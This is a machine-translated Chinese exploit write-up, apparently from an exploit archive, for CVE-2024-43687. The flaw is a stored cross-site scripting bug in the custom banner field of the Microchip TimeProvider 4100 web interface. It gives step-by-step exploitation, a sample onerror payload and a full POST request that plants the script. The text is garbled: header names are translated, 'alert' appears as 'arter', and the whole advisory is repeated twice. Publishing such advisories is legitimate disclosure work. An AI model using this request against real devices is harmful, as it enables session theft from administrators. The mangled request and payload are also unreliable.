#利用标题: Microchip TimeProvider 4100 Grandmaster(横幅) - 存储的XSS
#利用作者: Armando Huesca Prida
#发现了By: Armando Huesca Prida,Marco Negro,Antonio Carriero,Vito Pistillo,Davide Renna,Manuel Leone,Massimiliano Brolli
#披露日期: 27/06/2024
#CVE出版物的日期: 4/10/2024
#开发出版物: 10/10/2024
#供应商HomePage3360 https://www.microchip.com/
#版本:固件版本1.0至2.4.7
#测试ON:固件版本2.3.12
#CVE: CVE-2024-43687
#外部参考文献:
#url: https://www.cve.org/cvecord?id=cve-2024-43687
#url: https://www.0xhuesca.com/2024/10/cve-2024-43687.html
#url: https://www.microchip.com/en-us/sol...uct-security-vulnerability/timeprovider-4100-
#url: https://www.gruppotim.it/it/footer/red-team.html
#漏洞描述:
TimeProvider 4100 Grandmaster固件在自定义横幅配置字段中具有存储的跨站点脚本(XSS)漏洞。利用此漏洞的威胁参与者能够在任何用户上下文中执行任意脚本。
#开发步骤:
1-登录到设备的Web管理接口。
2-打开横幅配置面板。
3-选择“自定义横幅”功能。
4-插入恶意的JavaScript有效载荷。
5-应用并保存包含自定义横幅的系统配置。
6-连接到设备网络管理接口的受害者将在其浏览器中执行恶意有效载荷。
#恶意JavaScript Payload的示例:
img src=a onerror=arter(1)
#概念证明-POC:
通过手动修改以下请求,可以创建一个新的自定义设备横幅,其中包含恶意JavaScript有效负载,从而产生存储的XSS漏洞。在:下给出了在利用HTTP请求中必须更新的值列表。
POST /BANNERCONFIG HTTP /1.1
HOST: [设备IP]
cookie: ci_session=[session cookie]
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;边界=----------------------------------- 9680247575877256312575038502
内容长度: 673
Origin: https://[设备IP]
Referer: https://[设备IP]/BannerConfig
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
Connection:保持空白
------------------------------------------- 9680247575877256312575038502
content-disposition: form-data;名称='user_level'
1
------------------------------------------- 9680247575877256312575038502
content-disposition: form-data;名称='Bannerradio'
定制
------------------------------------------- 9680247575877256312575038502
content-disposition: form-data;名称='txtCustom'
[恶意JavaScript有效载荷]
------------------------------------------- 9680247575877256312575038502
content-disposition: form-data;名称='动作'
Applanner
---------------------------------------- 9680247575877256312575038502-
# 结尾
#利用作者: Armando Huesca Prida
#发现了By: Armando Huesca Prida,Marco Negro,Antonio Carriero,Vito Pistillo,Davide Renna,Manuel Leone,Massimiliano Brolli
#披露日期: 27/06/2024
#CVE出版物的日期: 4/10/2024
#开发出版物: 10/10/2024
#供应商HomePage3360 https://www.microchip.com/
#版本:固件版本1.0至2.4.7
#测试ON:固件版本2.3.12
#CVE: CVE-2024-43687
#外部参考文献:
#url: https://www.cve.org/cvecord?id=cve-2024-43687
#url: https://www.0xhuesca.com/2024/10/cve-2024-43687.html
#url: https://www.microchip.com/en-us/sol...uct-security-vulnerability/timeprovider-4100-
#url: https://www.gruppotim.it/it/footer/red-team.html
#漏洞描述:
TimeProvider 4100 Grandmaster固件在自定义横幅配置字段中具有存储的跨站点脚本(XSS)漏洞。利用此漏洞的威胁参与者能够在任何用户上下文中执行任意脚本。
#开发步骤:
1-登录到设备的Web管理接口。
2-打开横幅配置面板。
3-选择“自定义横幅”功能。
4-插入恶意的JavaScript有效载荷。
5-应用并保存包含自定义横幅的系统配置。
6-连接到设备网络管理接口的受害者将在其浏览器中执行恶意有效载荷。
#恶意JavaScript Payload的示例:
img src=a onerror=arter(1)
#概念证明-POC:
通过手动修改以下请求,可以创建一个新的自定义设备横幅,其中包含恶意JavaScript有效负载,从而产生存储的XSS漏洞。在:下给出了在利用HTTP请求中必须更新的值列表。
- [会话cookie]
- [恶意JavaScript有效载荷]
- [设备IP]
POST /BANNERCONFIG HTTP /1.1
HOST: [设备IP]
cookie: ci_session=[session cookie]
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;边界=----------------------------------- 9680247575877256312575038502
内容长度: 673
Origin: https://[设备IP]
Referer: https://[设备IP]/BannerConfig
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
Connection:保持空白
------------------------------------------- 9680247575877256312575038502
content-disposition: form-data;名称='user_level'
1
------------------------------------------- 9680247575877256312575038502
content-disposition: form-data;名称='Bannerradio'
定制
------------------------------------------- 9680247575877256312575038502
content-disposition: form-data;名称='txtCustom'
[恶意JavaScript有效载荷]
------------------------------------------- 9680247575877256312575038502
content-disposition: form-data;名称='动作'
Applanner
---------------------------------------- 9680247575877256312575038502-
# 结尾